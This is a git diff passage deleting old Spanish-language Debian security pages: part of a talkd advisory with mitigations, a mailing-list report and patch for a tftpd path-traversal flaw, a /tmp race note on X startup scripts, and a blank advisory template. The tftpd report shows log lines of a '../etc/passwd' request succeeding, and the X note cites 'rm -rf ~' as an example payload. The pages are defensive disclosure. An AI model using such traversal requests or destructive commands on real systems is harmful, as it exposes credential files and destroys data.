- Si se siguen las siguientes medidas para todas las t&eacute;cnicas de transformaci&oacute;n servidor/direcci&oacute;n, entonces su instlaci&oacute;n no s&oacute;lamente ser&aacute; inmune a &eacute;sta vulnerabilidad del talkd, sino adem&aacute;s para toda la casu&iacute;stica general de ataques basados en desbordamientos de servidor/direcci&oacute;n ip. <p>
-
-
- <ol>
- <li> Ataques basados en DNS <p>
-
- Para defenderse de un ataque basado en DNS, le rogamos encarecidamente que se actualice a BIND 4.9.4 Patchlevel 1 &oacute; superior (o el equivalente de su proveedor). La raz&oacute;n estriba en que BIND 4.9.4 Patchlevel 1 se halla adecuado al RFC (RFC 952) en la definici&oacute;n de la sintaxis para nombres de servidor (descrita en la notificaci&oacute;n CERT CA-96.04,"Informaci&oacute;n corrupta en Servidores de Red"). <p>
-
- Tenga en cuenta que una actualizaci&oacute;n a 4.9.5 puede precisar una actualizaci&oacute;n de sendmail debido a las extensiones POSIX de la m&aacute;s reciente versi&oacute;n de BIND (descrita en CA-96.04). Para la &uacute;ltima versi&oacute;n disponible de sendmail, consulte el fichero
- <a href="ftp://info.cert.org/pub/latest_sw_versions/sendmail">ftp://info.cert.org/pub/latest_sw_versions/sendmail</a> <p>
-
- <li> Otros Servicios de Informaci&oacute;n de Redes <p>
-
- Para aquellos sistemas basados en t&eacute;cnicas adicionales de transformaci&oacute;n nombre/direcci&oacute;n (tales como NIS, netinfo y ficheros planos como /etc/hosts), puede ser insuficiente usar la versi&oacute;n recomendada de BIND, puesto que las b&uacute;squedas DNS -y, por ende, la validaci&oacute;n nombre servidor/validaci&oacute;n de la direcci&oacute;n IP- pueden ser modificadas para hacer uso de las dem&aacute;s t&eacute;cnicas (NIS, netinfo, etc).
-Por tanto, animamos a los proveedores y a los usuarios a incluir en el conjunto de utilidades de resoluci&oacute;n el mismo c&oacute;digo utilizado por BIND para validar nombres de servidor y direcciones IP. Este c&oacute;digo se describe en la siguiente secci&oacute;n. <p>
-
-
- <li> C&oacute;digo "casero" o "a la mano" <p>
-
- Utilice las subrutinas de validaci&oacute;n de servidor y direcci&oacute;n IP disponiobles en las direcciones abajo expuestas. Incl&uacute;yalas en todos aquellos programas que utilicen el resultado de las b&uacute;squedas de nombre de servidor. <p>
-
- <a href="ftp://info.cert.org/pub/tools/ValidateHostname/IsValid.c">ftp://info.cert.org/pub/tools/ValidateHostname/IsValid.c</a> <br>
- <a href="ftp://ftp.cert.dfn.de/pub/tools/net/ValidateHostname/IsValid.c">ftp://ftp.cert.dfn.de/pub/tools/net/ValidateHostname/IsValid.c</a> <p>
-
- El fichero IsValid.c contiene c&oacute;digo para las subrutinas IsValidHostname y IsValidIPAddress. Este c&oacute;digo puede utilizarse para comprobar nombres v&aacute;lidos de servidor y direcciones IP de acuerdo a las RFCs 952 y 1123, as&iacute; como nombres conteniendo caracteres tomados de la pr&aacute;ctica tales como "_" y "/". <p>
-
-
- Los siguientes ficheros se hallan en el directorio (extra&iacute;do del fichero README):
-
- <pre>
- IsValid.l El fichero lex/flex que contiene el c&oacute;digo para
- IsValidHostname y IsValidIPAddress
- MD5 (IsValid.l) = 2d35040aacae4fb12906eb1b48957776
-
- IsValid-raw.c El fuente C creado mediante la ejecuci&oacute;n de flex
- sobre IsValid.l
- MD5 (IsValid-raw.c) = 367c77d3ef84bc63a5c23d90eeb69330
-
- IsValid.c El fichero creado mediante la concentraci&oacute;n de
- variables y definici&oacute;n de funciones de
- IsValid-raw.c
- MD5 (IsValid.c) = ffe45f1256210aeb71691f4f7cdad27f
-
- IsValid.diffs El fichero de diff entre IsValid-raw.c
- e IsValid.c
- MD5 (IsValid.diffs) = 3619022cf31d735151f8e8c83cce3744
-
- htest.c Rutina main para comprobar IsValidHostname
- y IsValidIPAddress
- MD5 (htest.c) = 2d50b2bffb537cc4e637dd1f07a187f4
- </pre>
- </ol>
-
- <li> Instalaci&oacute;n de un parche de su proveedor <p>
-
- Abajo se detalla una lista de aquellos proveedores que han suministrado informaci&oacute;n. Los detalles se hallan en el Ap&eacute;ndice A de &eacute;sta notificaci&oacute;n; iremos actualizando el ap&eacute;ndice a medida de ir recibiendo m&aacute;s informaci&oacute;n.
-
- Si su proveedor no se halla en &eacute;sta lista, ser&aacute; por no haber recibido informaci&oacute;n de &eacute;l. Por favor, contacte directamente con &eacute;l.
-
- Berkeley Software Design, Inc. (BSDI)
- Cisco Systems
- Data General Corporation
- FreeBSD, Inc.
- Hewlett-Packard Company
- IBM Corporation
- Linux
- NEC Corporation
- The Santa Cruz Operation, Inc. (SCO)
- Silicon Graphics Inc. (SGI)
- Solbourne (Grumman System Support)
- Sun Microsystems, Inc.
-
- <li> Deshabilite el/los programa(s) talkd <p>
-
- Hasta el momento en el cual Vd. pueda instalar un parche de su proveedor, deshabilite cualquier programa talkd existente el /etc/inetd.conf bien comentando &eacute;sas l&iacute;neas y relanzando inetd.
-
- Ejemplo de comandos (ejecutados desde root):
-
- # grep -i talk /etc/inetd.conf
- talk dgram udp wait root /usr/etc/in.talkd in.talkd
-
- Comentar *todas* las referencias a talkd, otalkd o ntalkd.
- (Los comentarios en /etc/inetd.conf comienzan por "#".)
-
- Tras editar /etc/inetd.conf, relance inetd. En varios equipos Unix, se lleva a cabo mandando una se&ntilde;al HUP al proceso inetd.
-
-
- Para SYSV:
-
- # ps -ef | grep inetd | grep -v grep
- # kill -HUP {inetd PID}
-
- Para BSD:
-
- # ps -aux | grep inetd | grep -v grep
- # kill -HUP {inetd PID}
-
- Tenga en cuenta que deshabilitar talkd le solucionar&aacute; s&oacute;lamente el problema al que hacemos mencion; sin embargo, no cubrir&aacute; el problema general de ataques sobre red que manipulan informaci&oacute;n de nombres de servidor/direcciones IP para aprovechar una vulnerabilidad.
- </ol>
-</ol>
-
-<hr>
-
-<h3>Ap&eacute;ndice A - Informaci&oacute;n de Proveedores.</h3>
-
-A continuaci&oacute;n se detalla una lista de todos los proveedores que han mandado informaci&oacute;n para &eacute;sta notificaci&oacute;n. Actualizaremos &eacute;ste ap&eacute;ndice seg&uacute;n vayamos recibiendo m&aacute;s informaci&oacute;n. Si no ve a su proveedor reflejado aqu&iacute;, por favor contacte directamente con &eacute;l. <p>
-
-<b>Linux</b> <p>
-
- Este error fu&eacute; corregido en Linux NetKit 0.08, que se entrega con todas las distribuciones medianamente actualizadas.
- Los usuarios de Linux que usen NetKit 0.07 &oacute; anterior deben actualizarlo a la versi&oacute;n 0.09. Esta versi&oacute;n ha corregido otros errores y por tanto se recomienda encarecidamente a aquellos a actualizarse dicha versi&oacute;n.
- Se halla disponible en:
- <a href="ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz"></a> <p>
-
- Algunos proveedores han optado por dotar a NetKit 0.08 de nuevas correcciones en vez de la 0.09. Consulte a su proveedor para una informaci&oacute;n m&aacute;s detallada. <p>
- La comunidad Linux le gustar&iacute;a agradecer a David A. Holland por su constante trabajo sobre la seguridad en redes Linux. <p>
-
-
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 de Enero de 1.998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/tftpd.html b/spanish/security/info/tftpd.html
deleted file mode 100644
index 9a5df6292dd..00000000000
--- a/spanish/security/info/tftpd.html
+++ /dev/null
@@ -1,111 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Domingo 23 de Marzo 1997 09:11:34 -0800 (PST)</b> <br>
-<b>Desde: Alex Belits &lt;abelits@phobos.illtel.denver.co.us&gt;</b> <p>
-
-[Mod: mensaje de David Holland's message a&ntilde;adido al final, linux-alert a&ntilde;adido a la lista de direcciones -- alex] <p>
-
-El S&aacute;bado 22 Mar 1997, Ben Cantrick escribi&oacute;:
-
-<em>
-Es una bonita trampa, y parece que funciona. Pero estoy convencido de que alguien ha visto la necesidad y ha hecho &eacute;sto anteriormente. Mis repetidas incursiones en la red desde varios buscadores no han conseguido nada relevante, por lo que estoy intrigado si alguien en la lista conoce (o mejor, tiene) c&oacute;digo fuente que sea libremente distribuible para un tftpd "seguro".<p>
-</em>
-
- En la distribuci&oacute;n FreeBSD, tftpd utiliza chroot() y fija su identificador de usuario (uid) a "nobody"
-No creo que haga nada relativo a grupos.. <p>
-
-Pero... he mirado en el tftpd de Linux (NetKit 0.09) y de FreeBSD (2.2-ALPHA)
- y he encontrado un c&oacute;digo realmente extra&ntilde;o dentro del de Linux, en la funci&oacute;n validate_access: <p>
-
-<pre>
- syslog(LOG_ERR, "tftpd: trying to get file: %s\n", filename);
-
- if (*filename != '/') {
- syslog(LOG_ERR, "tftpd: serving file from %s\n", dirs[0]);
- chdir(dirs[0]);
- } else {
- for (dirp = dirs; *dirp; dirp++)
- if (strncmp(filename, *dirp, strlen(*dirp)) == 0)
- break;
- if (*dirp==0 && dirp!=dirs)
- return (EACCESS);
- }
- /*
- * prevent tricksters from getting around the directory restrictions
- */
- for (cp = filename + 1; *cp; cp++)
- if(*cp == '.' && strncmp(cp-1, "/../", 4) == 0)
- return(EACCESS);
-</pre>
-
-...chequea _solamente_ el nombre del fichero contra "/../" y comienza _siempre_ desde la segunda letra del nombre del fichero (en otras palabras, si el nombre del fichero viene vac&iacute;o, "analiza" la memoria tras &eacute;l, donde habr&aacute; lo que haya metido otra parte del c&oacute;digo; por lo menos no har&aacute; nada destructivo).
-Pero adem&aacute;s asume que todos los nombres de fichero que no empiezan con '/' son relativos a alg&uacute;n directorio, y nunca los chequea contra "../", como el de FreeBSD hace. Luego: (vea el c&oacute;digo que sigue con los caminos que muestra la llamada a syslog()): <p>
-
-<pre>
-Mar 23 06:55:08 phobos in.tftpd[9799]: connect from phobos.illtel.denver.co.us
-Mar 23 06:55:08 phobos tftpd[9800]: tftpd: trying to get file: ../etc/passwd
-Mar 23 06:55:08 phobos tftpd[9800]: tftpd: serving file from /tftpboot
-</pre>
-
-...y obviamente se trataba de /tftpboot/../etc/passwd, o sea, /etc/passwd. <p>
-
-No hace ning&uacute;n da&ntilde;o en s&iacute; mismo, pero efectivamente no se pensaba que podr&iacute;a hacer eso. El tftpd de FreeBSD no autorizaba a hacer esas cosas. <p>
-
-De acuerdo con rese&ntilde;as de copyright, los dos tftpd se derivaron de antiguo c&oacute;digo de Berkeley (1983), y el de Linux tiene irregularidades en general sobre su s&oacute;digo ( y el directorio por defecto /tftpboot no existi&oacute; hasta la 0.09; la 0.08 parece ser que necesita la lista de directorios &oacute; sencillamente saldr&iacute;a por SIGSEV &oacute; "NULL pointer" ). <p>
-
-El tftpd de FreeBSD se compila mediante &eacute;ste comando: <p>
-<pre>
- gcc -O -DLOG_FTP=LOG_DAEMON -o tftpd tftpd.c tftpsubs.c
-</pre>
-
-y funciona bien si se a&ntilde;ade -ls /tftpboot como opci&oacute;n en la l&iacute;nea de comandos.
-Si no, s&oacute;lamente chequea permisos de fichero sin siquiera intentar convertirse en "nobody" y ello abre un agujero para directorios que no son ejecutables
-(aun siendo el directorio no ejecutable para nadie salvo para root, los ficheros en &eacute;l contenidos son accesibles).
-Adem&aacute;s es necesario lincar /dev/log bajo el directorio chroot para mantener las trazas (logging) en funcionamiento. <p>
-
-
-P.S. C&oacute;mo semejante ... obviamente, c&oacute;digo inseguro pudo colarse dentro de tftpd en primer lugar, despu&eacute;s de todas las revisiones que fueron hechas efectivamente para aumentar la seguridad? Despu&eacute;s de todo, los cambios entre versiones NetKit _si_ tienen sentido. <p>
-
-<b>Return-Path: dholland@hcs.harvard.edu</b> <p>
-
-<pre>
- [c&oacute;digo fuente de tftpd mapeado a /dev/null]
- Finalmente, previene de usar ".." y "." en el nombre de fichero que se utiliza:
-</pre>
-
-Es correcto; no bloquea los ".." cuando van delante en el caso que el nombre del fichero no empiece con "/". <p>
-
-Alguien ya se percat&oacute; de &eacute;sto y el arreglo ir&aacute; en la siguiente versi&oacute;n; mientras, aqu&iacute; hay un parche. <p>
-
-Necesita una fuerte recodificaci&oacute;n. No te quedes sin aliento... :( <p>
-
-<a href="tftpd.patch">Aqu&iacute;</a> est&aacute; el parche.
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 de Enero de 1.998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/tftpd.patch b/spanish/security/info/tftpd.patch
deleted file mode 100644
index 2c1597c9174..00000000000
--- a/spanish/security/info/tftpd.patch
+++ /dev/null
@@ -1,25 +0,0 @@
-*** tftpd.c 1996/12/29 18:42:40 1.8
---- tftpd.c 1997/03/08 11:31:00
-***************
-*** 40,44 ****
- */
- char rcsid[] =
-! "$Id$";
-
- /*
---- 40,44 ----
- */
- char rcsid[] =
-! "$Id$";
-
- /*
-***************
-*** 298,301 ****
---- 298,303 ----
- * prevent tricksters from getting around the directory restrictions
- */
-+ if (!strncmp(filename, "../", 3))
-+ return EACCESS;
- for (cp = filename + 1; *cp; cp++)
- if(*cp == '.' && strncmp(cp-1, "/../", 4) == 0)
-
diff --git a/spanish/security/info/xfree3.html b/spanish/security/info/xfree3.html
deleted file mode 100644
index e5b4bfae128..00000000000
--- a/spanish/security/info/xfree3.html
+++ /dev/null
@@ -1,29 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<blockquote>
-Los scripts de arranque de X a veces construyen un fichero de comandos a ejecutar en el directorio /tmp. Otro usuario puede cambiar ese fichero por otro, causando que la v&iacute;ctima ejecute cualquier cosa (como rm -rf ~)
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 de Enero de 1998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/template.html b/spanish/security/template.html
deleted file mode 100644
index a85e175f14a..00000000000
--- a/spanish/security/template.html
+++ /dev/null
@@ -1,81 +0,0 @@
-!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<DL>
-<DT>Fecha de notificaci&oacute;n: no-publico - ; publico -
-<P>
-<DT>Paquetes afectados:
-<P>
-<DT>Breve descripci&oacute;n:
- <DD>
-<P>
-<DT>Vulnerable: <FONT COLOR="#FF0000">Si</FONT>
-<P>
-<DT>Corregido en:
- <DD>
-<HR>
- <DD>Ficheros fuente:
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL><P>
-
- <DD>Arquitectura Intel:
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
-<P>
-<DT>Corregido en:
- <DD>
-<HR>
- <DD>Ficheros fuente:
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
-
-<P> Arquitectura Intel:
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
-
-<P> Arquitectura Motorola 68k:
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
-
-<P> Arquitectura Sparc:
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
-
-<P> Arquitectura Alpha:
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
-
-<P> Arquitectura PowerPC:
- <DD>http://ftp.debian.org/debian/
- <DD><SMALL>(MD5 checksum: )</SMALL>
-<P>
-<DT>Fecha de entrada en Distribuci&oacute;n: 19 de Abril de 1998
-</DL>
-
-<P><SMALL>Ultima modificaci&oacute;n: 11 de Mayo de 1998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>

© 2014-2024 Faster IT GmbH | imprint | privacy policy